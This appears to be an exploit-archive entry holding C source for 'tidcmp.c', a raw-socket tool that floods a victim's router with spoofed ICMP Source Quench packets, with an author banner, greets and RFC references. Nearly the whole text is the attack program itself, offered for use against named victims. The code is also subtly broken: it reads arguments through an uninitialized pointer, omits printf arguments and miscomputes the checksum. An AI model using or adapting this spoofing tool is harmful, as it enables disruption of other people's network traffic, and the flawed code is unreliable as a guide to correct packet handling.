tidcmp.c is an ICMP Source Quench attack. Sends spoofed ICMP type 4 packets to the victims router. Includes references to the relevant RFC's.
db223fd1d7252c5896709ec8d2d3cbedb3dafe880cb6106b6b57cdcd5ec79ff6
/*******************************************************
* TIDCMP.c
* ICMP Source Quench attack
* victim(spoofed) ICMP(code 4) --> victims.router.org
* Based on misteri0's code with references from
* from obecian's nemesis-icmp.c file
* Greets to Vetesgirl and g0d for the help with
* code tweaks, JHH, Spikeman, Speye, obecian, #unixgods
* Relevant RFC information:
* RFC1016, RFC0896, RFC077, RFC1254, RFC2075
* Remember this is only conceptualization...
* speedygrl: Jag alska dej mycket
* sil@antioffline.com/sil@deficiency.org
*******************************************************/
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
void usage( char *name );
char *get_progname( char *fullname );
void done( int foo );
void fux0r( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
( argc < 5 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
fprintf(stderr, "Can't resolve source host%s <-[]->\n");
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
fprintf(stderr,"Can't resolve source host%s <-[]->\n");
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, you must be r00t!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s \n", inet_ntoa(sin.sin_addr));
printf( "Target Host\t\t: %s \n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d \n", numpackets );
for( i = 0; i < numpackets; i++ )
fux0r( sockfd, sin, din );
printf( "sent %d packet%c...done\n", numpackets, ( numpackets > 1
)
? 's' : ( char )NULL );
return 0;
}
void usage( char *name )
{
printf( "antioffline.com/TID Source Quench Attack\n");
printf( "sample: victim --> victims.router\n");
printf( "Usage: [src] [dest] [number to send] [string]\n");
exit( 0 );
}
char *get_progname( char *fullname )
{
char *retval = strrchr( fullname, '/' );
return retval ? ++retval : fullname;
}
void done( int foo )
{
puts( "Exiting...\n" );
exit( 1 );
}
void fux0r(int port, struct sockaddr_in sin, struct sockaddr_in din)
{
char **argv;
char *stringtosend = argv[5];
char *packet;
int total;
struct iphdr *ip;
struct icmphdr *icmp;
size_t msglen = sizeof( stringtosend ), iphlen = sizeof( struct iphdr );
size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval );
int len = strlen( stringtosend );
packet = ( char * )malloc( iphlen + icplen + len );
ip = ( struct iphdr * )packet;
icmp = ( struct icmphdr * )( packet + iphlen );
( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )],( struct timezone * )NULL );
memcpy( ( packet + iphlen + icplen + timlen ), stringtosend, ( len - 4 ));
ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = din.sin_addr.s_addr;
ip->check = in_chksum( ( u_short * )ip, iphlen );
icmp->type = 4;
icmp->code = 0;
icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 )
) );
total = ( iphlen + icplen + timlen + len + 16 );
sendto( port, packet, total, 0,
( struct sockaddr * )&din, sizeof( struct sockaddr ) );
free( packet );
}
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
register int nleft = iplen;
register int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *ipbuf++;
nleft -= 2;
}
if( nleft == 1 )
{
*( u_char * )( &answer ) = *( u_char * )ipbuf;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum + 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}